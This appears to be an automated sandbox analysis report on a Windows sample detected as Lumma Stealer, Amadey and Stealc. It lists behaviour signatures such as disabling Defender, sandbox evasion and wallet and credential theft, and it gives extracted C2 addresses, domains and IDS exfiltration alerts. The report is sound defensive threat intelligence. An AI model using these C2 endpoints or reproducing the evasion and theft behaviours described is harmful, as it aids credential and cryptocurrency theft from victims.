Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1540733
MD5: 168a446710f2bab46f3da2d8a92008e2
SHA1: 8c83f817e6b6d98a3a5526dec196f7fc6ed90e54
SHA256: 1d90c40defe396301d00b6fe2d743c2e54f3fa5a8bb2be8800a104283506b1cf
Tags: exe, user-Bitsight

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\num[1].exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000009.00000002.1769530723.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 14.2.bd214fbd32.exe.50000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 8138ba21a1.exe.2332.10.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["spirittunek.store", "studennotediw.store", "dissapoiznw.store", "mobbipenju.store", "clearancek.site", "bathdoomgaz.store", "eaglepawnoy.store", "licendfilteo.site"], "Build id": "4SD0y4--legendaryy"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\num[1].exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe ReversingLabs: Detection: 55%
Source: file.exe Virustotal: Detection: 52%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49757 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49813 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49981 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49996 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50000 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50005 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50008 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50012 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50017 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50024 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:50026 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:50028 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50034 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50036 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50038 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:50049 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50051 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50052 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50058 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50066 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:50065 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:50077 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50075 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50069 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50087 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50090 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50091 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50094 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:50109 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50110 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50113 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50139 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50144 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50145 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50146 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 3BW8PCDTI0L77ZRRJ1.exe, 00000006.00000003.1646138104.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, 3BW8PCDTI0L77ZRRJ1.exe, 00000006.00000002.1779664446.0000000000412000.00000040.00000001.01000000.0000000A.sdmp
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: number of queries: 1420
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\PeerDistRepub
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Comms
Source: firefox.exe Memory has grown: Private usage: 1MB later: 188MB

Networking

Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.7:55158 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.7:65398 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.7:53069 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.7:49815 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.7:56595 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.7:51406 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.7:50494 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.7:64796 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49895 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.7:49911 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.7:59233 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.7:54108 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.7:54703 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.7:57591 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.7:53353 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.7:53237 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.7:55001 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49985 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49991 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49992 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.7:64390 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.7:62475 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.7:53075 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.7:62175 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.7:63021 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.7:60661 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.7:55394 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.7:52080 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49994 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49999 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:50006 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:50029 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.7:59413 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.7:49922
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:50043 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.7:55751 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.7:53731 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.7:52186 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.7:62275 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:50047 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.7:50193 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.7:55375 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.7:55742 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.7:63867 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:50082 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:50126 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:50137 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49746 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49763 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49763 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49757 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49757 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49800 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:50000 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:50000 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49981 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:50049 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49830 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:50038 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:50008 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:50005 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:50005 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.7:50036 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:50091 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.7:50091 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:50051 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:50051 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49996 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:50094 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:50052 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:50052 -> 104.21.53.8:443
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: spirittunek.store
Source: Malware configuration extractor URLs: studennotediw.store
Source: Malware configuration extractor URLs: dissapoiznw.store
Source: Malware configuration extractor URLs: mobbipenju.store
Source: Malware configuration extractor URLs: clearancek.site
Source: Malware configuration extractor URLs: bathdoomgaz.store
Source: Malware configuration extractor URLs: eaglepawnoy.store
Source: Malware configuration extractor URLs: licendfilteo.site
Source: Malware configuration extractor IPs: 185.215.113.43
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:01:42 GMTContent-Type: application/octet-streamContent-Length: 1895936Last-Modified: Thu, 24 Oct 2024 01:49:23 GMTConnection: keep-aliveETag: "6719a7a3-1cee00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:01:45 GMTContent-Type: application/octet-streamContent-Length: 1918464Last-Modified: Thu, 24 Oct 2024 01:49:16 GMTConnection: keep-aliveETag: "6719a79c-1d4600"Accept-Ranges: bytes
